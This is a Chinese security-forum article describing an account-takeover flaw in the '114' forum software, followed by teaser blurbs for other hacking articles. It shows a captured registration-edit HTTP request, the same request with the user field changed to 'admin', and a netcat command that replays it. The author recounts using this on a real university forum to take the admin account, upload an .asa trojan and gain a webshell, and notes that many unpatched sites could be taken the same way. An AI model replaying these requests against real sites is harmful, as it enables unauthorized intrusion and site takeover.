114论坛2005正式版漏洞
所属分类:
实用技巧 / 漏洞研究
阅读数:
1215
收藏 0赞 0分享
关键字:
"版权所有 设计制作:网站114"
漏洞描述:
网站114论坛 2005版正式
/edituserdb.asp
对提交数据和cooikes缺乏验证
导致任意用户可以修改管理员密码
默认后台admin/index.asp
今天在旁注一个机房的机器时用了一下。
http://www.***.net.cn/xzl/BBS/index.asp
**医科大学网站上的一个论坛。
注册了一个用户33221.
然后跳转到 /edituserdb.asp,单击“修改注册”开始抓包!
用记事本保存抓包内容如下:
-----------------------------------------------------------------------------------------------------------
POST /xzl/BBS//SaveUser_Account.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://www.***.net.cn/xzl/BBS//edituserdb.asp
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d61e41d605f6
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon)
Host: www.***.net.cn
Content-Length: 2304
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSCTSQSAB=EKMKINHAIAACMGFMKABJDBME
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUserCode"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtPassword"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtConfirmPassword"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtQuestion"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtAnswer"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUserName"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="selSex"
先生
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtNick"
11
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtProvince"
111
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtAddress"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtPostCode"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtTel"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtMobile"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtFax"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtEmail"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUrl"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtfile"; filename=""
Content-Type: application/octet-stream
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtOicq"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtDocument"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="submit"
修改注册信息
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtId"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtTempId"
-----------------------------7d61e41d605f6--
------------------------------------------------------------------------------------------------------------
其中:“
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUserCode"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtPassword"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtConfirmPassword"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtQuestion"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtAnswer"
33221
-----------------------------7d61e41d605f6
”
修改第一个"33221"为“admin”保存11.txt文本为:
POST /xzl/BBS//SaveUser_Account.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://www.***.net.cn/xzl/BBS//edituserdb.asp
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d61e41d605f6
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon)
Host: www.***.net.cn
Content-Length: 2304
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSCTSQSAB=EKMKINHAIAACMGFMKABJDBME
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUserCode"
admin
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtPassword"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtConfirmPassword"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtQuestion"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtAnswer"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUserName"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="selSex"
先生
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtNick"
11
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtProvince"
111
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtAddress"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtPostCode"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtTel"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtMobile"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtFax"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtEmail"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUrl"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtfile"; filename=""
Content-Type: application/octet-stream
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtOicq"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtDocument"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="submit"
修改注册信息
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtId"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtTempId"
-----------------------------7d61e41d605f6--
这里因为我注册的用户名33221与admin长度一至,所以这里不用修改字节长度。
然后用nc提交到服务器
nc www.***.net.cn 80 <11.txt
返回提示修改会员资料成功。
然后用admin 密码为申请33221的密码一至登录。
当然就是管理员权限了,然后登录后台,点击“修改栏目”,上传asa木马,ok,拿到webshll。
看了一下,这个论坛系统还没有出补丁,可以拿大批webshell了,不过我只要了对我比较有用的一个服务器,其它的没有去抓了。
MySQL Proxy(解决注入的另一思路)
MySQL Proxy的主要作用是用来做负载均衡,数据库读写分离的。但是需要注意的是,MySQL Proxy还有个强大的扩展功能就是支持Lua语言——魔兽也是使用了Lua来开发游戏,据我所知网易也是——可以参见云风的博客。
收藏 0赞 0分享
分析NtGodMode.exe干了什么
NtGodMode.exe是通过打开LSASS.EXE进程msv1_0.dll模块空间里,然后搜索特征值8B 4D 0C 49之后第1个32 C0 这个32C0汇编码xor al,al,修改为B001对应汇编码mov al,1 为什么mov al,1,以后就不用密码了?
收藏 0赞 0分享
伯乐asp收信程序漏洞及利用程序利用代码
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
文章作者:fhod
发这个也是因为看了asm所写的新概念收信程序 箱子永远不会被黑
收藏 0赞 0分享
字符集导致的浏览器跨站脚本攻击分析
前言:这种利用类型的攻击早在06年就被安全研究人员指出,不过一直没有在国内重视。而由于我们国内大部分站点正是这种有漏洞的字符集,所以影响还是比较大,希望各大站快速修复。可以看看http://applesoup.googlepages.com/。
收藏 0赞 0分享
Search Engine XSS Worm
作者:余弦
来源:0x37 Security
有挑战才有意思,为了诞生个Search Engine XSS Worm,这里拿yeeyan做实验了。
收藏 0赞 0分享
暂时屏蔽 IE 最新 0day的4 种方法
IE 最新 0day 波及了微软全线系统居然在2008年12月14日8:00:15还没有出补丁!我查看微软站点,好像有几个手动操作的办法暂时屏蔽。
收藏 0赞 0分享
